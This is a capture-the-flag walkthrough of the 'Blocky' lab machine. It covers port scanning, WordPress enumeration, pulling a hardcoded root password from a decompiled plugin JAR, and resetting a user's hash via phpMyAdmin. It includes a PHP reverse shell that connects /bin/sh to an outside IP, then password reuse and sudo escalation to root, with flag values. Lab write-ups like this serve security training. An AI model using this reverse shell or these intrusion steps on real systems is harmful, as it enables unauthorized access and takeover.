[Machines] [Easy] Blocky: JAR Decompilation

Published: 2024-07-28

Information Gathering

IP Address: 10.10.10.37
Open Ports: TCP 21, 22, 80, 25565

$ nmap -p- 10.10.10.37 --min-rate 1000 -sC -sV

PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)

HTTPD

# echo '10.10.10.37 blocky.htb'>>/etc/hosts

$ wpscan --url http://blocky.htb/ --enumerate u

username:notch

$ dirb http://blocky.htb

http://blocky.htb/plugins/

http://blocky.htb/phpmyadmin/

JAR Decompilation

$ wget http://blocky.htb/plugins/files/BlockyCore.jar

$ binwalk BlockyCore.jar

$ foremost BlockyCore.jar

$ cd ./output/zip

$ unzip 00000000.zip

$ cd ./com/myfirstplugin

$ javap -c BlockyCore.class

username:root password:8YsqfCTnvxAUeduzjNSXe22

www-data Access

Log in to phpMyAdmin and update notch's password

https://www.useotools.com/ru/wordpress-password-hash-generator

$P$BNG7MVQRrgfTW4aREpCCA7Bv80pHmf/

$ip = '10.10.16.6';
$port = 10032;
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);

$ curl http://blocky.htb/

$ su notch

Password: 8YsqfCTnvxAUeduzjNSXe22

User.txt

23da8f7548a2c1df972caa7fc6ca3b9d

Privilege Escalation

$ sudo -l

$ sudo /bin/bash

Root.txt

8e66e7402571816ee90419d1a6eca642